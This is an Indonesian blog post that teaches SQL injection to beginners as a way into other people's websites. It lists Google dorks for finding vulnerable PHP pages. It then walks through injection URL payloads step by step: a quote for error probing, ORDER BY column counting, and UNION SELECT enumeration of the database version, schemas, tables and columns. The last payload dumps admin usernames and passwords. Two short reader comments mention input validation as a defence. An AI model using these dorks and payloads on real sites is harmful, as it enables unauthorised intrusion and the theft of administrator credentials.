SQL Injection buat awam

SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking untuk menggapai akses pada sistem database yg berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL dalam mengolah suatu sistem database. Dengan teknik ini kita bisa mendapatkan informasi administrator dari website taget kita. Dan dengan begitu kita bisa melakukan apapun yang kita inginkan pada website tersebut.

Berikut langkah singkatnya:

A. Langkah pertama adalah persiapkan diri anda untuk rajin googling dan jauhi rasa malas. (ya ea lah !!!!)

B. Yang harus anda cari pada saat googling adalah dorks dari website target kita. Beberapa dork (kata kunci yang sering digunakan para defacer buat mencari web yang vulnerable) yang kita harus cari 1 per 1 misalnya adalah sebagai berikut:

• Bisa dilihat dari blog berikut ,http://sayagaptek.blogspot.com/2010/10/dork-kumpulan-dan-penjelasan.htm. klo mles buka link nih ane kasih liat sebagian: inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:forum_bds.php?num=

inurl:game.php?id=

inurl:view_product.php?id=

inurl:newsone.php?id=

inurl:sw_comment.php?id=

inurl:news.php?id=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=

inurl:show_an.php?id=

inurl:preview.php?id=

inurl:download.php?id=

inurl:main.php?id=

inurl:review.php?id=

inurl:read.php?id=

“id=” & intext:”Warning: mysql_fetch_assoc()

“id=” & intext:”Warning: mysql_fetch_array()

“id=” & intext:”Warning: mysql_num_rows()

Trus udah dapet dorknya kita harus ngapain nih??? Hehe santai ya, let’s continue to the next step.

C. Nah selanjutnya kita masuk deh ke halaman website target kita (disini kita misalkan di http://www.contoh.com). Nah di halaman tersebut kita coba sisipin 1-1 dork di atas. Misal sebagai berikut :

http://www.contoh.com/index.php?id=3

trus kita periksa apa ada bug mySQLnya ato ngga, caranya kita tambahin “’”, begini:

http://www.contoh.com/index.php?id=3’

trus tekan enter sampai muncul pesan error.

D. Sekarang kita cari tahu jumlah kolom yang ada menggunakan sintak “order by”. Ketikan order by(number)—pada akhir url seperti berikut:

http://www.contoh.com/index.php?id=3

order by (number)— selanjutnya kita coba dengan order by 8—dan bila kita mendapai error berati kolom yang tersedia hanya ada 7. Lalu catat nama2 kolom yang ditemukan. Sekarang kita cari tau kolom2 yang dapat diakses, gimana tuh?????? Kadieu kang ^_^

Untuk mendapatkan informasi dari kolom yang ingin kita dapatkan, kita gunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:

http://www.contoh.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7—

lalu akan muncul tabel. Lalu catatlah seluruh informasi yang bisa kamu ambil disitu, misalnya nomor tabel dll.

E. Sekarang kita cari versi dari dapabase mySQL, begini sintaknya; http://www.contoh.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7— lalu kita ganti angka “1” dengan “@@version” untuk mengetahui versi databasenya.

http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7—

nah sekarang kamu udh dapeti informasi tentang database yang digunakan.

F. Langkah selanjutnya kita cari tau nama database yang digunakan oleh target kita. Sintaknya begini neh:

http://www.contoh.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata—

nah sekarang kita udah tau daftr database yang ada tinggal dicari database mana yang digunakan. Dengan sintak berikut:

http://www.contoh.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7–

G. Nama database udah dapet nih, sekarang kita cari nama tabelnya. Sintaknya begini barudagz:

http://www.contoh.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()—

H. Selanjutnya ya nama kolomnya juga, sintaknya gini nih nih nih deh di cobain ya….

http://www.contoh.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()—

I. Nah nah nah nah sekarang kita udah tau nama database, nama tabel, nama kolom. Sekarang kita gabung ketiganya untuk mendapatkan informasi. Gini neah..

http://www.contoh.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename—

Selanjutnya ganti “columnname” dengan kolom yang anda mau ambil informasinya. “0x3a” akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing kolom. Jangan lupa juga untuk merubah “databasename.tablename” dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut. Contohnya gini barudak:

http://www.contoh.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin—

nah sekarang kita semua sudah mendapatkan informasi mengenai username dan database dari target kita….

Buat sekarang sekian dulu ya barudagz… tar kita lanjut lagi.. Sebelumnya saya berterima kasih kepada http://www.binushacker.net/sql-injection-tutorial.html

See yaa…….

3 thoughts on “SQL Injection buat awam

  1. cara bwt ngesecure nya gmn tuh?
    kalo saya pribadi si, tetep harus di validasi, misal kalo pake get, variabel x ini cuma boleh masuk tipe data string, int, atau boolean. trs kalo string, string apa aja yang boleh masuknya, jadi yang coba maen” tendang aja,

    1. klo saya baca ma c emang di website kitanya harus lebih hati2 pada ” ‘ ” dan “=”. jadi ya bikin script buat ngeblock karakter tersebut di form loginnya

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s